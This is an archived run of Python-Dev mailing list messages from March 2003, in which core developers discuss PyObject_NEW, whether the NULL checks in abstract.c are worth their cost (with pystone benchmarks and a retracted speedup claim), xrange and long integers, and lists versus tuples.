What, precisely, does PyObject_NEW save you?  From a brief squint at
the sources, my best guess is "nothing" -- and it may even be a
pessimization due to increased code size.

Maybe we could kill it entirely (after the usual round of
deprecations, of course).

Cheers,
M.

-- 
  Like most people, I don't always agree with the BDFL (especially
  when he wants to change things I've just written about in very 
  large books), ... 
         -- Mark Lutz, http://python.oreilly.com/news/python_0501.html


From dave@boost-consulting.com  Thu Mar 13 12:28:00 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Thu, 13 Mar 2003 07:28:00 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <7kb4z7jk.fsf@python.net> (Thomas Heller's message of "12 Mar
 2003 20:52:47 +0100")
References: <LNBBLJKPBEHFEDALKOLCAEMCEAAB.tim.one@comcast.net>
 <7kb4z7jk.fsf@python.net>
Message-ID: <uvfyn4fjj.fsf@boost-consulting.com>

Thomas Heller <theller@python.net> writes:

>> I don't think the macro versions should ever be used outside the core.
>> Inside the core, it's safe.  So I think the "doc bug" is that the docs
>> mention PyObject_NEW at all.
>>=20
>
> Better to expl=EDcitely warn about them with a wording similar to that
> from the section 9.2 Memory Interface:
>
>   In addition, the following macro sets are provided for calling the
>   Python memory allocator directly, without involving the C API
>   functions listed above. However, note that their use does not preserve
>   binary compatibility accross Python versions [] and is therefore
>   deprecated in extension modules.
>
> Maybe 'and compilers' should be inserted between the [].

I'm not in a position to decide which one of these is better.  Thomas,
maybe you should be submitting the patch?

--=20
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From dave@boost-consulting.com  Thu Mar 13 12:26:35 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Thu, 13 Mar 2003 07:26:35 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <m31y1bbtfe.fsf@mira.informatik.hu-berlin.de> (martin@v.loewis.de's
 message of "13 Mar 2003 08:46:13 +0100")
References: <LNBBLJKPBEHFEDALKOLCEELLEAAB.tim.one@comcast.net>
 <uvfyo5suq.fsf@boost-consulting.com>
 <m31y1c6zi9.fsf@mira.informatik.hu-berlin.de>
 <u65qo5j0v.fsf@boost-consulting.com>
 <m31y1bbtfe.fsf@mira.informatik.hu-berlin.de>
Message-ID: <uy93j4flw.fsf@boost-consulting.com>

martin@v.loewis.de (Martin v. L=F6wis) writes:

> David Abrahams <dave@boost-consulting.com> writes:
>
>> > No. You also cannot pass struct FILE* from one C library to the other;
>> > file locking will then crash.
>>=20
>> A file is a resource.
>
> Yes, but printf is neither allocation nor deallocation.

fprintf, but point taken.

--=20
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From theller@python.net  Thu Mar 13 12:39:28 2003
From: theller@python.net (Thomas Heller)
Date: 13 Mar 2003 13:39:28 +0100
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <uvfyn4fjj.fsf@boost-consulting.com>
References: <LNBBLJKPBEHFEDALKOLCAEMCEAAB.tim.one@comcast.net>
 <7kb4z7jk.fsf@python.net> <uvfyn4fjj.fsf@boost-consulting.com>
Message-ID: <8yvjqw3j.fsf@python.net>

David Abrahams <dave@boost-consulting.com> writes:

> Thomas Heller <theller@python.net> writes:
> 
> >> I don't think the macro versions should ever be used outside the core.
> >> Inside the core, it's safe.  So I think the "doc bug" is that the docs
> >> mention PyObject_NEW at all.
> >> 
> >
> > Better to expl�citely warn about them with a wording similar to that
> > from the section 9.2 Memory Interface:
> 
> I'm not in a position to decide which one of these is better.  Thomas,
> maybe you should be submitting the patch?

Nor am I. You can submit a patch as well, and the discussion will show.

Sorry, no time.

Thomas


From dave@boost-consulting.com  Thu Mar 13 13:00:24 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Thu, 13 Mar 2003 08:00:24 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <8yvjqw3j.fsf@python.net> (Thomas Heller's message of "13 Mar
 2003 13:39:28 +0100")
References: <LNBBLJKPBEHFEDALKOLCAEMCEAAB.tim.one@comcast.net>
 <7kb4z7jk.fsf@python.net> <uvfyn4fjj.fsf@boost-consulting.com>
 <8yvjqw3j.fsf@python.net>
Message-ID: <uhea74e1j.fsf@boost-consulting.com>

Thomas Heller <theller@python.net> writes:

> David Abrahams <dave@boost-consulting.com> writes:
>
>> Thomas Heller <theller@python.net> writes:
>>=20
>> >> I don't think the macro versions should ever be used outside the core.
>> >> Inside the core, it's safe.  So I think the "doc bug" is that the docs
>> >> mention PyObject_NEW at all.
>> >>=20
>> >
>> > Better to expl=EDcitely warn about them with a wording similar to that
>> > from the section 9.2 Memory Interface:
>>=20
>> I'm not in a position to decide which one of these is better.  Thomas,
>> maybe you should be submitting the patch?
>
> Nor am I. You can submit a patch as well, and the discussion will show.
>
> Sorry, no time.

Fair enough; Tim's patch was much easier ;-)

--=20
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From fuf@mageo.cz  Thu Mar 13 13:36:09 2003
From: fuf@mageo.cz (Michal Vitecek)
Date: Thu, 13 Mar 2003 14:36:09 +0100
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really needed?
Message-ID: <20030313133609.GA23223@foof.i3.cz>

[this was sent to python-list, but i'm re-posting here as told by Skip]

 hello,

 i had a quick look at Objects/abstract.c in 2.2.2's source. almost
 every function there checks whether the objects it's passed are not
 NULL. if they are, SystemError exception occurs. since i've never come
 across such exception i've commented out those checks.

 the resulting python binary did 6.5% more pystones on average (the
 numbers are below). my question is: are those checks really necessary
 in non-debug python build?

 the pystone results:

 BEFORE:

$ for (( i = 0; i <= 5; i++ )); do ./pystone.py; done
Pystone(1.1) time for 10000 passes = 0.6
This machine benchmarks at 16666.7 pystones/second
Pystone(1.1) time for 10000 passes = 0.56
This machine benchmarks at 17857.1 pystones/second
Pystone(1.1) time for 10000 passes = 0.58
This machine benchmarks at 17241.4 pystones/second
Pystone(1.1) time for 10000 passes = 0.57
This machine benchmarks at 17543.9 pystones/second
Pystone(1.1) time for 10000 passes = 0.57
This machine benchmarks at 17543.9 pystones/second

 AFTER:

$ for (( i = 0; i <= 5; i++ )); do ./pystone.py; done
Pystone(1.1) time for 10000 passes = 0.54
This machine benchmarks at 18518.5 pystones/second
Pystone(1.1) time for 10000 passes = 0.57
This machine benchmarks at 17543.9 pystones/second
Pystone(1.1) time for 10000 passes = 0.55
This machine benchmarks at 18181.8 pystones/second
Pystone(1.1) time for 10000 passes = 0.52
This machine benchmarks at 19230.8 pystones/second
Pystone(1.1) time for 10000 passes = 0.52
This machine benchmarks at 19230.8 pystones/second
Pystone(1.1) time for 10000 passes = 0.54

-- 
		fuf		(fuf@mageo.cz)


From mwh@python.net  Thu Mar 13 13:45:45 2003
From: mwh@python.net (Michael Hudson)
Date: Thu, 13 Mar 2003 13:45:45 +0000
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really
 needed?
In-Reply-To: <20030313133609.GA23223@foof.i3.cz> (Michal Vitecek's message
 of "Thu, 13 Mar 2003 14:36:09 +0100")
References: <20030313133609.GA23223@foof.i3.cz>
Message-ID: <2msmtre5x2.fsf@starship.python.net>

Michal Vitecek <fuf@mageo.cz> writes:

>  i had a quick look at Objects/abstract.c in 2.2.2's source. almost
>  every function there checks whether the objects it's passed are not
>  NULL. if they are, SystemError exception occurs. since i've never come
>  across such exception i've commented out those checks.

There are a number of bits of stupidly defensive programming in
Python... personally, I'd like to see the back of them.

>  the resulting python binary did 6.5% more pystones on average (the
>  numbers are below).

Wow!  Can we persuade you to try CVS HEAD?

>  my question is: are those checks really necessary
>  in non-debug python build?

This is the tricky bit, of course.  I don't think so, but it's hard to
be sure.

OTOH, it could be the easiest 5% speed up ever...

Cheers,
M.

-- 
  This makes it possible to pass complex object hierarchies to
  a C coder who thinks computer science has made no worthwhile
  advancements since the invention of the pointer.
                                       -- Gordon McMillan, 30 Jul 1998


From mwh@python.net  Thu Mar 13 14:06:56 2003
From: mwh@python.net (Michael Hudson)
Date: Thu, 13 Mar 2003 14:06:56 +0000
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really
 needed?
In-Reply-To: <2msmtre5x2.fsf@starship.python.net> (Michael Hudson's message
 of "Thu, 13 Mar 2003 13:45:45 +0000")
References: <20030313133609.GA23223@foof.i3.cz>
 <2msmtre5x2.fsf@starship.python.net>
Message-ID: <2mptove4xr.fsf@starship.python.net>

Michael Hudson <mwh@python.net> writes:

>>  the resulting python binary did 6.5% more pystones on average (the
>>  numbers are below).
>
> Wow!  Can we persuade you to try CVS HEAD?

Actually, I've now tried it, and saw a pystone increase of more like
0.1%.  Are you sure the abstract.c changes are the only difference
between the two binaries?

Cheers,
M.

-- 
  I've reinvented the idea of variables and types as in a
  programming language, something I do on every project.
                                          -- Greg Ward, September 1998


From fuf@mageo.cz  Thu Mar 13 14:18:58 2003
From: fuf@mageo.cz (Michal Vitecek)
Date: Thu, 13 Mar 2003 15:18:58 +0100
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really needed?
In-Reply-To: <2msmtre5x2.fsf@starship.python.net>
References: <20030313133609.GA23223@foof.i3.cz> <2msmtre5x2.fsf@starship.python.net>
Message-ID: <20030313141858.GB23223@foof.i3.cz>

Michael Hudson wrote:
>Wow!  Can we persuade you to try CVS HEAD?

 okay - i did as you said and the speed-up is only 2.1% so it's not
 probably worth it. here come the numbers:

 BEFORE:

$ for (( i = 0; i <= 5; i++ )); do ./python Lib/test/pystone.py; done
Pystone(1.1) time for 50000 passes = 1.97
This machine benchmarks at 25380.7 pystones/second
Pystone(1.1) time for 50000 passes = 1.92
This machine benchmarks at 26041.7 pystones/second
Pystone(1.1) time for 50000 passes = 1.96
This machine benchmarks at 25510.2 pystones/second
Pystone(1.1) time for 50000 passes = 1.97
This machine benchmarks at 25380.7 pystones/second
Pystone(1.1) time for 50000 passes = 1.96
This machine benchmarks at 25510.2 pystones/second
Pystone(1.1) time for 50000 passes = 1.96
This machine benchmarks at 25510.2 pystones/second

 AFTER:

$ for (( i = 0; i <= 5; i++ )); do ./python Lib/test/pystone.py; done
Pystone(1.1) time for 50000 passes = 1.95
This machine benchmarks at 25641 pystones/second
Pystone(1.1) time for 50000 passes = 1.93
This machine benchmarks at 25906.7 pystones/second
Pystone(1.1) time for 50000 passes = 1.91
This machine benchmarks at 26178 pystones/second
Pystone(1.1) time for 50000 passes = 1.92
This machine benchmarks at 26041.7 pystones/second
Pystone(1.1) time for 50000 passes = 1.89
This machine benchmarks at 26455 pystones/second
Pystone(1.1) time for 50000 passes = 1.89
This machine benchmarks at 26455 pystones/second

-- 
		fuf		(fuf@mageo.cz)


From guido@python.org  Thu Mar 13 14:29:38 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 13 Mar 2003 09:29:38 -0500
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really needed?
In-Reply-To: Your message of "Thu, 13 Mar 2003 14:36:09 +0100."
 <20030313133609.GA23223@foof.i3.cz>
References: <20030313133609.GA23223@foof.i3.cz>
Message-ID: <200303131429.h2DETem03635@odiug.zope.com>

>  i had a quick look at Objects/abstract.c in 2.2.2's source. almost
>  every function there checks whether the objects it's passed are not
>  NULL. if they are, SystemError exception occurs. since i've never come
>  across such exception i've commented out those checks.
> 
>  the resulting python binary did 6.5% more pystones on average (the
>  numbers are below). my question is: are those checks really necessary
>  in non-debug python build?

Unfortunately, this is part of the safety net for poor extension
writers, and I'm not sure we can drop it.

Given that Pystone is so regular, it's probably just one or two of the
functions you changed that make the difference.  If you can figure out
which ones, perhaps you could inline just those (in the switch in
ceval.c) and get the same effect.

Anyway, I only get a 1% speedup.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mwh@python.net  Thu Mar 13 14:33:21 2003
From: mwh@python.net (Michael Hudson)
Date: Thu, 13 Mar 2003 14:33:21 +0000
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really
 needed?
In-Reply-To: <20030313141858.GB23223@foof.i3.cz> (Michal Vitecek's message
 of "Thu, 13 Mar 2003 15:18:58 +0100")
References: <20030313133609.GA23223@foof.i3.cz>
 <2msmtre5x2.fsf@starship.python.net>
 <20030313141858.GB23223@foof.i3.cz>
Message-ID: <2mn0jze3pq.fsf@starship.python.net>

Michal Vitecek <fuf@mageo.cz> writes:

> Michael Hudson wrote:
>>Wow!  Can we persuade you to try CVS HEAD?
>
>  okay - i did as you said and the speed-up is only 2.1% so it's not
>  probably worth it. here come the numbers:

I didn't say "*two* point one", I said "*nought* point one"!:

  BEFORE:

$ for i in 1 2 3 4 5; do ./python- ../Lib/test/pystone.py; done 
Pystone(1.1) time for 50000 passes = 3.39
This machine benchmarks at 14749.3 pystones/second
Pystone(1.1) time for 50000 passes = 3.39
This machine benchmarks at 14749.3 pystones/second
Pystone(1.1) time for 50000 passes = 3.38
This machine benchmarks at 14792.9 pystones/second
Pystone(1.1) time for 50000 passes = 3.37
This machine benchmarks at 14836.8 pystones/second
Pystone(1.1) time for 50000 passes = 3.39
This machine benchmarks at 14749.3 pystones/second

  AFTER:

$ for i in 1 2 3 4 5; do ./python ../Lib/test/pystone.py; done
Pystone(1.1) time for 50000 passes = 3.38
This machine benchmarks at 14792.9 pystones/second
Pystone(1.1) time for 50000 passes = 3.38
This machine benchmarks at 14792.9 pystones/second
Pystone(1.1) time for 50000 passes = 3.38
This machine benchmarks at 14792.9 pystones/second
Pystone(1.1) time for 50000 passes = 3.38
This machine benchmarks at 14792.9 pystones/second
Pystone(1.1) time for 50000 passes = 3.4
This machine benchmarks at 14705.9 pystones/second

If it was a 2% gain, I'd say go for it (though Guido isn't so sure, it
seems).

What compiler/platform are you using?

Cheers,
M.

-- 
  languages shape the way we think, or don't.
                                        -- Erik Naggum, comp.lang.lisp


From skip@pobox.com  Thu Mar 13 14:42:26 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 13 Mar 2003 08:42:26 -0600
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really
 needed?
In-Reply-To: <2mn0jze3pq.fsf@starship.python.net>
References: <20030313133609.GA23223@foof.i3.cz>
 <2msmtre5x2.fsf@starship.python.net>
 <20030313141858.GB23223@foof.i3.cz>
 <2mn0jze3pq.fsf@starship.python.net>
Message-ID: <15984.39122.349303.287830@montanaro.dyndns.org>

Michal,

Can you post your changes to abstract.c as a patch on SourceForge?  That
would allow multiple people to mull it over and all be sure they are working
from the same code base.  If Michael Hudson and Guido reported substantially
different speedups than you, perhaps you were doing something they weren't.

Skip


From fuf@mageo.cz  Thu Mar 13 15:09:05 2003
From: fuf@mageo.cz (Michal Vitecek)
Date: Thu, 13 Mar 2003 16:09:05 +0100
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really needed?
In-Reply-To: <2mn0jze3pq.fsf@starship.python.net>
References: <20030313133609.GA23223@foof.i3.cz> <2msmtre5x2.fsf@starship.python.net> <20030313141858.GB23223@foof.i3.cz> <2mn0jze3pq.fsf@starship.python.net>
Message-ID: <20030313150905.GC23223@foof.i3.cz>

Michael Hudson wrote:
>>  okay - i did as you said and the speed-up is only 2.1% so it's not
>>  probably worth it. here come the numbers:
>
>I didn't say "*two* point one", I said "*nought* point one"!:

 crap. i found the problem - on a _completely unused_ computer the
 difference is indeed only ~0.7%. my apologies for false alarm :/

        sorry,
-- 
		fuf		(fuf@mageo.cz)


From dave@boost-consulting.com  Thu Mar 13 16:27:07 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Thu, 13 Mar 2003 11:27:07 -0500
Subject: [Python-Dev] More int/long integration issues
Message-ID: <ur89b1bc4.fsf@boost-consulting.com>

I was recently surprised by:

    Python 2.3a2+ (#1, Feb 24 2003, 15:02:10)
    [GCC 3.2 20020927 (prerelease)] on cygwin
    Type "help", "copyright", "credits" or "license" for more information.
    >>> xrange(2 ** 32)
    Traceback (most recent call last):
      File "<stdin>", line 1, in ?
    OverflowError: long int too large to convert to int

Now that we have a kind of long/int integration, maybe it makes sense
to update xrange()?  Or is that really a 2.4 feature?

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From mal@lemburg.com  Thu Mar 13 16:30:09 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 13 Mar 2003 17:30:09 +0100
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really needed?
In-Reply-To: <20030313150905.GC23223@foof.i3.cz>
References: <20030313133609.GA23223@foof.i3.cz>	<2msmtre5x2.fsf@starship.python.net> <20030313141858.GB23223@foof.i3.cz>	<2mn0jze3pq.fsf@starship.python.net> <20030313150905.GC23223@foof.i3.cz>
Message-ID: <3E70B211.4030600@lemburg.com>

Michal Vitecek wrote:
> Michael Hudson wrote:
> 
>>> okay - i did as you said and the speed-up is only 2.1% so it's not
>>> probably worth it. here come the numbers:
>>
>>I didn't say "*two* point one", I said "*nought* point one"!:
> 
>  crap. i found the problem - on a _completely unused_ computer the
>  difference is indeed only ~0.7%. my apologies for false alarm :/

I'd rather suggest to take a look at making more use of
the available Python macros in the interpreter.

Things like PyInt_AsLong() can often be written as PyInt_AS_LONG()
because there's a type check only a few lines above the call.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 13 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                     19 days left
EuroPython 2003, Charleroi, Belgium:                       103 days left


From aahz@pythoncraft.com  Thu Mar 13 16:42:47 2003
From: aahz@pythoncraft.com (Aahz)
Date: Thu, 13 Mar 2003 11:42:47 -0500
Subject: [Python-Dev] More int/long integration issues
In-Reply-To: <ur89b1bc4.fsf@boost-consulting.com>
References: <ur89b1bc4.fsf@boost-consulting.com>
Message-ID: <20030313164247.GB22296@panix.com>

On Thu, Mar 13, 2003, David Abrahams wrote:
> 
> I was recently surprised by:
> 
>     Python 2.3a2+ (#1, Feb 24 2003, 15:02:10)
>     [GCC 3.2 20020927 (prerelease)] on cygwin
>     Type "help", "copyright", "credits" or "license" for more information.
>     >>> xrange(2 ** 32)
>     Traceback (most recent call last):
>       File "<stdin>", line 1, in ?
>     OverflowError: long int too large to convert to int
> 
> Now that we have a kind of long/int integration, maybe it makes sense
> to update xrange()?  Or is that really a 2.4 feature?

IIRC, it was decided that doing that wouldn't make sense until the
standard sequences (lists/tuples) can support more than 2**31 items.
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

Register for PyCon now!  http://www.python.org/pycon/reg.html


From guido@python.org  Thu Mar 13 17:24:33 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 13 Mar 2003 12:24:33 -0500
Subject: [Python-Dev] More int/long integration issues
In-Reply-To: Your message of "Thu, 13 Mar 2003 11:27:07 EST."
 <ur89b1bc4.fsf@boost-consulting.com>
References: <ur89b1bc4.fsf@boost-consulting.com>
Message-ID: <200303131724.h2DHOZS05548@odiug.zope.com>

> Now that we have a kind of long/int integration, maybe it makes sense
> to update xrange()?  Or is that really a 2.4 feature?

IMO, xrange() must die.

As a compromise to practicality, it should lose functionality, not
gain any.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mcherm@mcherm.com  Thu Mar 13 17:31:08 2003
From: mcherm@mcherm.com (Chermside, Michael)
Date: Thu, 13 Mar 2003 12:31:08 -0500
Subject: [Python-Dev] Re: More int/long integration issues
Message-ID: <7F171EB5E155544CAC4035F0182093F03CF792@INGDEXCHSANC1.ingdirect.com>

Guido writes:
> IMO, xrange() must die.

Glad to hear it. I always found range() vs xrange() a wart.

But if you had it do do over, how would you do it?

-- Michael Chermside


From dave@boost-consulting.com  Thu Mar 13 17:43:04 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Thu, 13 Mar 2003 12:43:04 -0500
Subject: [Python-Dev] More int/long integration issues
In-Reply-To: <200303131724.h2DHOZS05548@odiug.zope.com> (Guido van Rossum's
 message of "Thu, 13 Mar 2003 12:24:33 -0500")
References: <ur89b1bc4.fsf@boost-consulting.com>
 <200303131724.h2DHOZS05548@odiug.zope.com>
Message-ID: <u8yvj17tj.fsf@boost-consulting.com>

Guido van Rossum <guido@python.org> writes:

> IMO, xrange() must die.
>
> As a compromise to practicality, it should lose functionality, not
> gain any.

OK, range() becomes lazy, then?  Or is there another plan?

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From guido@python.org  Thu Mar 13 19:03:27 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 13 Mar 2003 14:03:27 -0500
Subject: [Python-Dev] Re: More int/long integration issues
In-Reply-To: Your message of "Thu, 13 Mar 2003 12:31:08 EST."
 <7F171EB5E155544CAC4035F0182093F03CF792@INGDEXCHSANC1.ingdirect.com>
References: <7F171EB5E155544CAC4035F0182093F03CF792@INGDEXCHSANC1.ingdirect.com>
Message-ID: <200303131903.h2DJ3Ug06240@odiug.zope.com>

> Guido writes:
> > IMO, xrange() must die.
> >
> > As a compromise to practicality, it should lose functionality, not
> > gain any.

[Michael Chermside]
> Glad to hear it. I always found range() vs xrange() a wart.

It is, and it is one that I hate.

> But if you had it do do over, how would you do it?

I'd make range() an iterator.  To get a concrete list that you can
modify, you'd have to write list(range(N)).  But that can't be done 
without breaking backwards compatibility, so I won't.

[David Abrahams]
> OK, range() becomes lazy, then?  Or is there another plan?

The bytecode compiler should be clever enough to see that you're
writing

  for i in range(...): ...

and that there's no definition of range other than the built-in one
(this requires a subtle change of language rules); it can then
substitute an internal equivalent to xrange().

--Guido van Rossum (home page: http://www.python.org/~guido/)


From python@rcn.com  Thu Mar 13 19:15:09 2003
From: python@rcn.com (Raymond Hettinger)
Date: Thu, 13 Mar 2003 14:15:09 -0500
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really needed?
References: <20030313133609.GA23223@foof.i3.cz>  <200303131429.h2DETem03635@odiug.zope.com>
Message-ID: <007d01c2e994$ddb73c00$3c10a044@oemcomputer>

> >  i had a quick look at Objects/abstract.c in 2.2.2's source. almost
> >  every function there checks whether the objects it's passed are not
> >  NULL. if they are, SystemError exception occurs. since i've never come
> >  across such exception i've commented out those checks.

> Unfortunately, this is part of the safety net for poor extension
> writers, and I'm not sure we can drop it.

Can we get most of the same benefit by using 
an assert() rather than NULL-->SystemError?


Raymond Hettinger


From jeremy@zope.com  Thu Mar 13 20:01:03 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 13 Mar 2003 15:01:03 -0500
Subject: [Python-Dev] are NULL checks in Objects/abstract.c really
 needed?
In-Reply-To: <007d01c2e994$ddb73c00$3c10a044@oemcomputer>
References: <20030313133609.GA23223@foof.i3.cz>
 <200303131429.h2DETem03635@odiug.zope.com>
 <007d01c2e994$ddb73c00$3c10a044@oemcomputer>
Message-ID: <1047585663.4296.2.camel@slothrop.zope.com>

On Thu, 2003-03-13 at 14:15, Raymond Hettinger wrote:
> > >  i had a quick look at Objects/abstract.c in 2.2.2's source. almost
> > >  every function there checks whether the objects it's passed are not
> > >  NULL. if they are, SystemError exception occurs. since i've never come
> > >  across such exception i've commented out those checks.
> 
> > Unfortunately, this is part of the safety net for poor extension
> > writers, and I'm not sure we can drop it.
> 
> Can we get most of the same benefit by using 
> an assert() rather than NULL-->SystemError?

No.  assert() causes the program to fail.  SystemError() raises an
exception and lets the program keep going.  Those are vastly different
effects.

Jeremy


From python@rcn.com  Thu Mar 13 20:16:03 2003
From: python@rcn.com (Raymond Hettinger)
Date: Thu, 13 Mar 2003 15:16:03 -0500
Subject: [Python-Dev] are NULL checks in Objects/abstract.c reallyneeded?
References: <20030313133609.GA23223@foof.i3.cz> <200303131429.h2DETem03635@odiug.zope.com> <007d01c2e994$ddb73c00$3c10a044@oemcomputer> <1047585663.4296.2.camel@slothrop.zope.com>
Message-ID: <002d01c2e99d$5fd188a0$3c10a044@oemcomputer>

> > Can we get most of the same benefit by using 
> > an assert() rather than NULL-->SystemError?
> 
> No.  assert() causes the program to fail.  SystemError() raises an
> exception and lets the program keep going.  Those are vastly different
> effects.

Of course.  My thought was that either one will come to the
attention of the extension writer before the extension goes out.
But then, if the code in question never got excercised, then it
would crash in the hands of a user.


Raymond Hettinger

#################################################################
#################################################################
#################################################################
#####
#####
#####
#################################################################
#################################################################
#################################################################


From python-kbutler@sabaydi.com  Thu Mar 13 20:09:01 2003
From: python-kbutler@sabaydi.com (Kevin J. Butler)
Date: Thu, 13 Mar 2003 13:09:01 -0700
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <20030312164902.10494.64514.Mailman@mail.python.org>
References: <20030312164902.10494.64514.Mailman@mail.python.org>
Message-ID: <3E70E55D.1050102@sabaydi.com>

> *Guido van Rossum * guido@python.org <mailto:guido%40python.org>
> //
>
>Tuples are for heterogeneous data, list are for homogeneous data.
>
Only if you include *both* null cases:

- tuple of type( i ) == type( i+1 )
- list of PyObject

Homo-/heterogeneity is orthogonal to the primary benefits of lists 
(mutability) and of tuples (fixed order/length). 

Else why can you do list( (1, "two", 3.0) )  and  tuple( [x, y, z] ) ?

>Tuples are *not* read-only lists.
>
It just happens that "tuple( sequence )" is the most easy & obvious (and 
thus right?) way to spell "immutable sequence".

Stop reading whenever you're convinced. ;-)    (not about mutability, 
but about homo/heterogeneity)

There are three (mostly) independent characteristics of tuples (in most 
to least important order, by frequency of use, IMO):

- fixed order/fixed length - used in function argument/return tuples and 
all uses as a "struct"
- heterogeneity allowed but not required - used in many function 
argument tuples and many "struct" tuples
- immutability - implies fixed-order and fixed-length, and used 
occasionally for specific needs

The important characteristics of lists are also independent of each 
other (again, IMO on the order):

- mutability of length & content - used for dynamically building collections
- heterogeneity allowed but not required - used occasionally for 
specific needs

It turns out that fixed-length sequences are often useful for 
heterogeneous data, and that most sequences that require mutability are 
homogeneous.

Examples from the standard library (found by  grep '= (' and grep '= \[' ):

    # homogeneous tuple - homogeneity, fixed order, and fixed length are 
all required
    # CVS says Guido wrote/imported this.  ;-)
    whrandom.py:        self._seed = (x or 1, y or 1, z or 1)

    # homogeneous tuple - homogeneity is required - all entries must be 
'types'
    # suitable for passing to 'isinstance( A, typesTuple )', which 
(needlessly?) requires a tuple to avoid
    # possibly recursive general sequences
    types.py:    StringTypes = (StringType, UnicodeType)   

    # heterogeneous list of values of all basic types (we need to be 
able to copy all types of values)
    # this could be a tuple, but neither immutability, nor fixed length, 
nor fixed order are needed, so it makes more sense as a list
    # CVS blames Guido here, too, in version 1.1.  ;-)
    copy.py:    l = [None, 1, 2L, 3.14, 'xyzzy', (1, 2L), [3.14, 'abc'], 
{'abc': 'ABC'}, (), [], {}]

Other homogeneous tuples (may benefit from mutability, but require 
fixed-length/order):
- 3D coordinates
- RGB color
- binary tree node (child, next)

Other heterogeneous lists (homogeneous lists of base-class instances 
blah-blah-blah):
- files AND directories to traverse (strings? "File" objects?)
- emails AND faxes AND voicemails AND tasks in your Inbox (items?)
- mail AND newsgroup accounts (accounts?)
- return values OR exceptions from a list of test cases and test suites 
(PyObjects? introduce an artificial base class?)

Must-be-stubborn-if-you-got-this-far-ly y'rs  ;-)

kb


From cnetzer@mail.arc.nasa.gov  Thu Mar 13 20:25:17 2003
From: cnetzer@mail.arc.nasa.gov (Chad Netzer)
Date: 13 Mar 2003 12:25:17 -0800
Subject: [Python-Dev] More int/long integration issues
In-Reply-To: <20030313164247.GB22296@panix.com>
References: <ur89b1bc4.fsf@boost-consulting.com>
 <20030313164247.GB22296@panix.com>
Message-ID: <1047587117.660.33.camel@sayge.arc.nasa.gov>

On Thu, 2003-03-13 at 08:42, Aahz wrote:
> On Thu, Mar 13, 2003, David Abrahams wrote:

> > Now that we have a kind of long/int integration, maybe it makes sense
> > to update xrange()?  Or is that really a 2.4 feature?
> 
> IIRC, it was decided that doing that wouldn't make sense until the
> standard sequences (lists/tuples) can support more than 2**31 items.

I'm working on a patch that allows both range() and xrange() to work
with large (PyLong) values.  Currently, with my patch, the length of
range is still limited to a C long (due to memory issues anyway), and
xrange() could support longer sequences (conceptually), although
indexing them still is limited to C int indices.

I noticed the need for a least supporting long values when I found some
bugs in code that did things like:

a = 1/1e-5
range( a-20, a)

or

a = 1/1e-6
b = 1/1e-5
c = 1/1e-4
range(a, b, c)

Now, this example is hardcoded, but in graphing software, or other
numerical work, the actual values come from the data set.  All of a
sudden, you could be dealing with very small numbers (say, because you
want to examine error values), and you get:

a = 1/1e-21
b = 1/1e-20
c = 1/1e-19
range(a, b, c)

And your piece of code now fails.  By the comments I've seen, this
failure tends to come as a big surprise (people are simply expecting
range to be able to work with PyLong values, over short lengths).

Also, someone who is working with large files (> C long on his machine)
claimed to be having problems w/ xrange() failing (although, if he is
indexing the xrange object, my patch can't help anyway)

I've seen enough people asking in the newsgroups about this behavior (at
least four in the past 5 months or so), and I've submitted some
application patches to make things work for these cases (ie. by
explicitly subtracting out the large common base of each parameter, and
adding it back in after the list is generated), so I decided to make a
patch to change the range behavior.

Fixing range was relatively easy, and could be done with no performance
penalty (the code to handle longs ranges is only invoked after the
existing code path fails; the common case is unaltered).  Fixing
xrange() is trickier, and I'm opting to maintain backwards compatibility
as much as possible.

In any case, I should have the patch ready to submit within the next
week or so (just a few hours more work is needed, for testing and
cleanup)

Then the argument about whether it should ever be included can begin in
earnest.  But I have seen enough examples of people being surprised that
ranges of long values (where the range length is well within the
addressable limit, but the range values must be PyLongs) that I think at
least range() should be fixed.  And if range() is fixed, then sadly,
xrange() should be fixed as well (IMO).

BTW, I'm all for deprecating xrange() with all deliberate speed.  Doing
so would only make updating range behavior easier.

Chad


From jeremy@zope.com  Thu Mar 13 20:35:45 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 13 Mar 2003 15:35:45 -0500
Subject: [Python-Dev] are NULL checks in Objects/abstract.c
 reallyneeded?
In-Reply-To: <002d01c2e99d$5fd188a0$3c10a044@oemcomputer>
